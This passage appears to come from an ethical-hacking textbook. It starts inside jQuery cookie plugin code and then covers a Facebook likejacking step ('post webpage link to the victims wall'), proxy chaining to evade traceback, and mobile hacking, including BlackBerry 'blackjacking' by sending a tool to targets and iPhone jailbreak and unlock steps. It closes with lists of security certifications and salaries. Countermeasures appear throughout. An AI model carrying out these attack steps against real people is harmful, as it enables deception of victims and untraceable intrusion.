* @option String domain The value of the domain attribute of the cookie (default: domain of page that created the cookie). * @option Boolean secure If true, the secure attribute of the cookie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/[email protected] */ /** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/[email protected] */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) { var date; if (typeof options.expires == 'number') { date = new Date(); date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000)); } else { date = options.expires; } expires = '; expires=' + date.toUTCString(); // use expires attribute, max-age is not supported by IE } // CAUTION: Needed to parenthesize options.path and options.domain // in the following expressions, otherwise they evaluate to undefined // in the packed version for some reason... var path = options.path ? '; path=' + (options.path) : ''; var domain = options.domain ? '; domain=' + (options.domain) : '';

var secure = options.secure ? '; secure' : ''; document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join(''); } else { // only name given, get cookie var cookieValue = null; if (document.cookie && document.cookie != '') { var cookies = document.cookie.split(';'); for (var i = 0; i < cookies.length; i++) { var cookie = jQuery.trim(cookies[i]); // Does this cookie string begin with the name we want? if (cookie.substring(0, name.length + 1) == (name + '=')) { cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } };

Now post webpage link to the victims wall,When victim will click on like button,he will be redirected to your webpage.

Countermeasures
(1)Dont click on shorten url (bit.ly, goo.gl etc.) (2)Dont click on naked or violate image & video link. (3)Dont click on any application which has different domain then facebook.

Chapter 13
Objectives:

Proxy & VPN technology

Proxy technology Introduction Working of proxy server

Types of proxy server Socks proxy Free proxy servers Use proxies for attack Tools VPN Introduction Working of VPN Types of VPN Free VPN services VPN Tools

Proxy Technology Introduction

Proxy server is a server, acts as intermediate between internal and external host. Proxy server hides the computer from outside network.

Working of Proxy Server

When Internal server requests to process a website then it enters to proxy server ,proxy server adds the header from the ip packet and change reconstructs the data packet with different ip address and send it to external host.

Types of Proxy Server

Caching Proxy Server: Caching is the servicing the requests of clients with the help of saved contents from previous requests, without contacting specified server. Web Proxy Server: Proxy targeted to World Wide Web is called web proxy server. Anonymizing Proxy Server: It tried to annonimize the web surfing. Transparent Proxy Server: It doesnt modify the request and response which is required for proxy authentication and identification, It works on port 80.

Non Transparent Proxy Server: It is a proxy that modifies the request and response in order to add some services to user agent.

Socks Proxy
Socks is an IETF Stranded. It is proxy system which supports proxy aware applications. Its package includes three components. (1)Socks server for the operating system. (2)A Client program like ftp,telnet etc. (3)A Client library for socks. The Socks proxy doesnt allow the external components to collect the information of the client which had generated a request,

Free Proxy Servers

Attacking from thousand of proxy servers would be difficult to trace, There are thousand of proxy servers are available on the internet. Some websites which provides free proxy servers are below: http://www.proxy4free.com/ http://spys.ru/en/ http://tools.rosinstrument.com/proxy/?rule1

Use of Proxies for attack

An attacker uses chain of proxies for attack, IDS or Firewall system install at the victim server will always log last proxy ip address that why traceback is difficult.

Tools
Allegrosurf
It is web accelerating, content filtering, proxy server. It allows user to share a single internet connection with the rest of the network while protecting users from unwanted content and increasing overall speed.

Download Link: http://www.downloadsofts.com/download/Servers/Firewall-ProxyServers/AllegroSurf-download-details.html

Proxy Manager
It connects to the internet and download lists of proxy servers from various websites, You will have thousand of proxy server IP addresses within a minute.

Download Link: http://www.brothersoft.com/proxy-manager-35000.html

Tor Proxy Chaining Software

Tor is network of virtual tunnels connected together and works like a big chained proxy. It masks identity of originated computer from the internet. It is the best proxy tool ever made.

Download Link: https://www.torproject.org/download/download.html.en

JAP Proxy
JAP enables anonymous web surfing with any browser through the use of integrated proxy services that hide your real IP address.

Download Link: http://en.kioskea.net/download/download-3480-jap

VPN(Virtual Private Network) Introduction

A virtual private network (VPN) is a network that uses primarily public telecommunication infrastructure, such as the Internet, to provide remote offices or traveling users access to a central organizational network. VPNs typically require remote users of the network to be authenticated, and often secure data with encryption technologies to prevent disclosure of private information to unauthorized parties.

Working of VPN

When internal server requests to transfer data to external host over the internet, VPN creates encrypted tunnel between internal server and external host while transferring data over the internet.

Types of VPN
PPTP VPN(Dial-up VPN)
A simple method for VPN is PPTP. It is a software based VPN system that uses your existing Internet connection. By using your existing Internet connection, a secure "tunnel" is created between two points allowing a remote user to connect to a remote network.

Site-to-site VPN
Site-to-site is the same much the same thing as point-to-point except there is no "dedicated" line in use. Each site has its own internet connection which may not be from the same ISP or even the same type. One may have a T1 while the other only has DSL. Unlike point-to-point, the routers at both ends do all the work. They do all the routing and encryption.

Point-to-Point VPN
A traditional VPN can also come as a point-to-point. These are also referred to as "leased-line VPNs." Simply put, two or more networks are connected using a dedicated line from an ISP. These lines can be packet or circuit switched. For example, T1's, Metro Ethernet, DS3, ATM or something else.

MPLS VPN
MPLS is a true "ISP-tuned" VPN. It requires 2 or more sites connected via the same ISP or an "on-net" connection*. There is a way to configure this using different ISP's or "offnet" but you never get the same performance. I've tried... While it does use your existing Internet connection, tweaks are made by your ISP for performance and security.

Free VPN Services

VPN protects user privacy over the internet.There are few services available on internet which provides free vpn services.

ProXPN

A free VPN service designed for use with Windows and Mac computers. ProXPN works by downloading a small free application from which to connect. The service is also compatible with the iPhone and other mobile phones that support VPN. Web:www.proxpn.com

GPass

The GPass service provides free VPN access as well as an impressive fast web proxy to use directly in your browser. The service is very popular in China where internet censorship is commonplace. Web: http://gpass1.com/gpass/

CyberGhost

Offering 1GB of encypted traffic per month on the free package, CyberGhost is another Windows-only VPN client. In order to use the service you are required to register for a free account which unfortunately does not allow you to pick and choose your servers. Web: http://cyberghostvpn.com/en/surf-anonym.html

SecurityKiss

The free package provided by SecurityKiss brings you 300MB of data transfer per day, but provides an uncapped line with plenty of speed. Youll need the SecurityKiss software to access the service, and this is only compatible with Windows. Web: http://www.securitykiss.com/

VPN Tools
VPN software brings the security of a private network to an insecure network, and allows you to access private local networks from anywhere. There are some vpn tools available which can we use to protect our privacy.

OpenVPN

OpenVPN is an open source VPN server that's easy to set up for use with open source VPN clients. You can easily export configuration files from OpenVPN to import into a variety of open source and commercial clients. Download Link: http://www.openvpn.net/

LogMeIn Hamachi

Hamachi's strongest attribute is its ease of use. If you've read some of the other entries in the Hive Five and realized that you don't want a contract for a corporate VPN or the hassle of configuring a bunch of routers with open-source firmware packages, and you just want to set up a simple virtual network between you and your friend, your phone, or your office, Hamachi offers nearly instant deployment. Download Link: http://www.logmeinhamachi.com/

Windows Built-In VPN

Windows has a built-in VPN client. Before exploring other client solutions, it's worth pulling up the quick launch box in the Windows start menu and typing "VPN" to start the configuration process. In Windows versions prior to Windows Vista, the built-in VPN client received a fair amount of criticism for lacking features and supported protocols.

Chapter 14
Objectives:

Hacking Handheld devices

Different OS in Mobile Phones What can a hacker do with your mobile phone
Vulnerabilities in different mobile phones Spywares Blackberry Handheld devices Iphone & Ipod Jailbreaking Iphone hacking using ifuntastic Trojans & viruses Mobile antivirus Mobile phone security tips

Different OS in Mobile Phone

Windows mobile Symbian OS Blackberry OS Apple iOS

What Can a Hacker DO with your mobile phone

Steal your information Rob your money Spying Acessing your voice mails,messages etc. Insert the virus

Vulnerabilities in different Mobile Phones

A format string vulnerability has been found in RIMs Blackberry 7270, It allows remote hacker to disable phones calling feature. HTC Hytn using AGEPhone is vulnerable to malformed SIP messages sent over wireless LAN connections, It allows remote hacker to disconnect active calls. A Bufferoverflow vulnerability in Samsung SCH-i730 that runs SJPhone SIP clients,It allows an attacker to disable the phone and slow down the operating system.

Spyware:SymbOS/Htool-SMSSender.A.intd
It is a prototype malware application that targets symbian OS. It sends copies of received SMS messages to the spyware author. Spyware:SymbOS/Htool-SMSSender.A.intd is distributed as XaSMS.SIS. Both the source code and SIS file are included in a RAR archive file named HackSMS.rar. It copies the text of last SMS message received,places it into a new SMS, and forwards the message to the spyware.

Spyware:SymbOS/MultiDropper.CG
It is the spyware application that targets the symbian operating system for mobile phones. The spyware application comes with a variant of the MultiDropper mobile phone Trojan.

It tracks messages copies log files with the phone number of incoming and outgoing phone calls.

Blackberry Handheld device

Blackberry attack toolkit along with BBproxy software exploits the vulnerability of any companys website. BBproxy is security assessment software allows proxy connection between internet and internal network. Attack vector tricks or links user to download malicious software. Blackjacking

BBproxy tool is used for Blackjacking attack.An attacker need to install this tool on his blackberry device then he should have to send it in email attachments to the targets. The channel between Blackberry server and handheld device is encrypted and cant be properly inspected by security products. Blackberry Wireless Security The blackberry enterprise solution uses AES and triple-DES encryption method to encrypt data in transit. The blackberry enterprise solution is designed so that data remains encrypted during transit between handheld device and blackberry server.

Countermeasures Clean Blackberry device memory. Protect storage messages on the messaging server. Encrypt application password and storage on the blackberry device. Use AES technology to secure the storage of password keeper.

IPhone & IPod Jailbreaking

Jailbreaking is the process of unlocking of ipod and iphone to allows the installation third party applications.It opens up your iPhones filesystem so that it can be accessed from your computer.

Tools for Jailbreaking

There are few tools available for iphone jailbreaking. iDemocracy

iDemocracy is iPhone jailbreak and third party app for windows platform. It installs installer.app(for third party app,games ) & simunlock. Download Link: http://code.google.com/p/idemocracy/downloads/list

iActivator

It works on Mac operatin system providing GUI tools for iPhone jailbreaking, activation/deactivation. Download Link: http://www.filestube.com/c191b10600f1cfcd03ea,g/iActivator-v1-14.html iFuntastic

iFuntastic is iPhone modification & hacking tool. It has full file browser feature,which simply browses the iphones internal file system, and edit UI images. Download Link: http://ifuntastic.soft32.com/free-download

iPhone Hacking using iFuntastic

Prerequisite An Intel Mac The iPhone Hacking Kit Your Mac and iPhone need to be connected to the same wi-fi network.

Steps to perform iPhone Hacking Install iFuntastic to your applications folder. After installing, Reboot your Mac safely. Make sure your iPhone is on, Then plug it into your Mac using usb cable. After iTunes Launches, quit it Launch iFuntastic Press prepare button, present on left side of iFuntastic window. Click the jailbreak button at the bottom of the window. On the next page of the window, there are six steps, follow them. You will see the window as on next slide.

Tool to unlock iPhone: anySIM

anySIM is a GUI-Based unlocking system for iPhone. This is for iPhones working recently with OSv1.1.1 running on it or iPhones that were upgraded from 1.0.2 to 1.1.1

Steps for Unlocking your iPhone using AnySIM Jailbreak your iPhone with software. Set up to install third party applications. Now download AnySIM and expand the ZIP file. Drag the resulting file anySIM (full name, anySIM.app) to your /Applications Folder. Open terminal (Located in /Applications/Utilities) and type the following : Scp r /Applications/anySIM.app root@IPADDRESS: /Applications/ -replace the ipaddress with the ipaddress of your iPhone . Restart your iPhone Run the anySIM application to unlock your phone.

Trojans and Viruses

Cabir: Infects mobile phones running on Symbian OS. When a phone is infected, the message 'Caribe' is displayed on the phone's display and is displayed every time the phone is turned on. The worm then attempts to spread to other phones in the area using wireless Bluetooth signals.

Duts: A parasitic file infector virus and is the first known virus for the PocketPC platform. It attempts to infect all EXE files in the current directory (infects files that are bigger than 4096 bytes). Skulls: A trojan horse piece of code. Once downloaded, the virus, called Skulls, replaces all phone desktop icons with images of a skull. It also will render all phone applications, including SMSes and MMSes useless. Commwarrior: First worm to use MMS messages in order to spread to other devices. Can spread through Bluetooth as well. It infects devices running under OS Symbian Series 60. The executable worm file, once launched, hunts for accessible Bluetooth devices and sends the infected files under a random name to various devices.

Antivirus
Kaspersky Antivirus

Kaspersky Anti-virus Mobile protects smartphones from malicious programs that targets mobile platforms. Download Link: http://www.kaspersky.com/kaspersky_mobile_security BitDefender Mobile security

BitDefender Mobile security provides antivirus protection for mobile devices running Symbian or Microsoft windows Mobile. Download Link: http://www.bitdefender.com/solutions/mobile-security-android.html BullGuard Mobile Antivirus

BullGuard protects Pocket PCs and smartphones from malicious programs that targets mobile platforms. It offers both On-Demand and On-Access Scanning. Download Link: http://www.bullguard.com/products/bullguard-mobile-security-10.aspx

Mobile Phone Security Tips

Keep your mobile antivirus updated. When entering a crowed zone, make sure to switch off Bluetooth. Do not open untrustworthy applications. Do not pair with unknown devices. Register 15 digits IMEI number for your GSM Handset. Protect your device by setting up a Personal identification number(PIN).

Chapter 15

Career certification in IT Security

Objectives:
CompTIA Cisco systems EC Council GIAC ISACA Offensive security (ISC)2

IT security certifications rose 3.1% in value over the past two years and 1.2% in value in the last six months. Certain types of security skills are seeing dramatic growth. A 27% rise in value was measured for the Certified Information Security Manager designation, just in the past six months. Brodkin reported on a survey carried out for the International Information Systems Security Certification Consortium, (ISC)^2, which showed "that holders of the CISSP, SSCP or CAP certifications who work in the Americas and have at least five years experience earn [an average of] $102,376 per year more than $21,000 higher than IT pros who also have five years experience but lack the certifications." There are some vendors working is the field of information security which provides Career certification to candidates.

CompTIA

CompTIA is a provider of professional certifications for the information technology (IT) industry. CompTIA chairs and manages the Initiative for Software Choice. Certifications provided in information security are: Security+ CSPA

Visit http://www.comptia.org/ for more details.

Cisco Systems

Cisco Systems also sponsors a line of IT Professional certifications for Cisco products. There are five levels of certification: Entry, Associate, Professional, Expert, and recently Architect, as well as eight different paths, Routing & Switching, Design, Network Security, Service Provider, the newly introduced Service Provider Operations, Storage Networking, Voice, and Wireless. Certifications in Information security: CCNA Security CCSP CCIE Security

EC-Council

The EC-Council is best known for its professional certifications for the IT security field. It offers numerous certifications in a variety of fields related to IT security, including disaster recovery, secure programming, e-Business and general IT security knowledge. These are some famous certifications products of EC-Council. C!EH CH!FI E!CSA LPT ENSA

GIAC

(GIAC) is an information security certification entity that specialises in technical and practical certification as well as new research in the form of its GIAC Gold program. GSIF GSEC GCIA

ISACA

ISACA is an international professional association that deals with IT Governance. It is an affiliate member of IFAC Previously known as the Information Systems Audit and Control Association, ISACA now goes by its acronym only, to reflect the broad range of IT governance professionals it serves. CISA CISM

Offensive Security

Offensive security is leading information Security Company which offers High skilled training on Information security products It is the only one of vendor who offer real time live training on information technology. It offers following certification courses OSCP ( Offensive security certified professional) OSEE ( Offensive security exploitation expert) OSWE ( Offensive security web expert) OSCE ( Offensive security certified expert) OSWP ( Offensive security certified wireless professional)

(ISC)

The International Information Systems Security Certification Consortium ((ISC)2) is a non-profit organization headquartered in Palm Harbor, Florida. The most widely known certification offered by the organization is a Certified Information Systems Security Professional (CISSP) certification. [1] [2] The organization maintains what it calls a Common Body of Knowledge for information security for the following certifications: CISSP ISAAP SSAP SSCP

List of top 10 Highest Paying IT Certifications

According to recent salary surveys by ZDNET's Tech Republic organization, the following are the highest paying certifications to have in the technology industry. Following each certification is the average annual salary being paid to individual responders that hold the certification. I have also listed training resources to learn more information about how to acquire each of the highest paying certifications. 1. PMI Project Management Professional (PMP) With an average annual salary of $101,695, the PMP certification from the Project Management Institute (PMI) organization tops the list of highest paying certifications for the current year.

2. PMI Certified Associate in Project Management (CAPM) Next highest on the list of highest paying certifications is PMI's Certified Associate in Project Management (CAPM). The average annual salary for CAPM holders that were surveyed is $101,103. 3. ITIL v2 - Foundations With an annual average salary of $95,415 the ITIL v2 Foundations certification came up third on the list of highest paying certifications. ITIL stands for the IT Infrastructure Library. The ITIL certification is designed to show expertise in ITIL service support and service delivery. 4. Certified Information Systems Security Professional (CISSP) Coming in at a close 4th on the list of highest paying certifications is the Certified Information Systems Security Professional or CISSP certification from (ISC)2. The average annual reported salary was $94,018. 5. Cisco CCIE Routing and Switching At $93,500 per year average annual salary, the Cisco CCIE Routing and Switching certification came in 5th on the list of highest paying certifications in the technology industry. 6. Cisco CCVP - Certified Voice Professional Number six on the list of the highest paying certifications is the Cisco CCVP or Cisco Certified Voice Professional. The average annual salary of CCVP respondents was $88,824. 7. ITIL v3 - ITIL Master The ITIL v3 certification - the ITIL Master - came in 7th on the list of the highest paying technical certifications. The average annual salary for ITIL Master Certification holders was $86,600.

8. MCSD - Microsoft Certified Solution Developer The MCSD or Microsoft Certified Solution Developer certification pays an average of $84,522. This puts the MCSD certification at number 8 on the list of highest paying certifications in technology. 9. Cisco CCNP - Cisco Certified Network Professional Cisco Certified Network professional or CCNP certification is number 9 on the list of highest paying technical certifications. The average annual salary reported by CCNP holders is $84,161. 10. Red Hat Certified Engineer The Red Hat Certified Engineer (RGCE) came in at number 10 on the list of highest paying certifications. The average annual salary reported by Red Hat Certified Engineers is $83,692.